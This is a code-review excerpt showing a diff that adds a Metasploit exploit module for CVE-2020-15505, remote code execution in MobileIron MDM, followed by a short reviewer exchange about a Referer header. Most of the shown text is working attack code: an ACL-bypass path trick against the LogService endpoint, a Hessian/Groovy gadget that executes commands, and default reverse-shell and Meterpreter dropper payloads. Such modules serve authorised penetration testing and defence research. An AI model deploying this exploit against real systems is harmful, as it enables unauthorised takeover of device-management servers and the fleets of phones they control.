modules/exploits/linux/http/mobileiron_mdm_hessian_rce.rb

```diff
@@ -0,0 +1,147 @@
+          'Orange Tsai', # Discovery
+          'rootxharsh', # Exploit
+          'iamnoooob', # Exploit
+          'wvu' # Module
+        ],
+        'References' => [
+          ['CVE', '2020-15505'],
+          ['URL', 'https://www.mobileiron.com/en/blog/mobileiron-security-updates-available'],
+          ['URL', 'https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html'],
+          ['URL', 'https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2020-15505']
+        ],
+        'DisclosureDate' => '2020-09-12', # Public disclosure
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => {
+                'CMDSTAGER::FLAVOR' => :bourne,
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(443),
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def check
+    # http://hessian.caucho.com/doc/hessian-1.0-spec.xtp#Call
+    res = send_request_hessian('c')
+
+    unless res
+      return CheckCode::Unknown('Target did not respond to check.')
+    end
+
+    unless res.code == 200 && res.headers['Content-Type'] == 'application/x-hessian'
+      return CheckCode::Safe('ACL bypass failed.')
+    end
+
+    CheckCode::Vulnerable('ACL bypass successful.')
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    vprint_status("Executing command: #{cmd}")
+
+    send_request_hessian(groovy_gadget(cmd))
+  end
+
+  def send_request_hessian(data)
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/mifs/.;/services/LogService'),
+      'ctype' => 'x-application/hessian',
+      'headers' => {
+        'Referer' => 'https://github.com/rapid7/metasploit-framework'
```

Comment:
Is this necessary? This seems like signature bait.

Reply:
I would never do that. 😇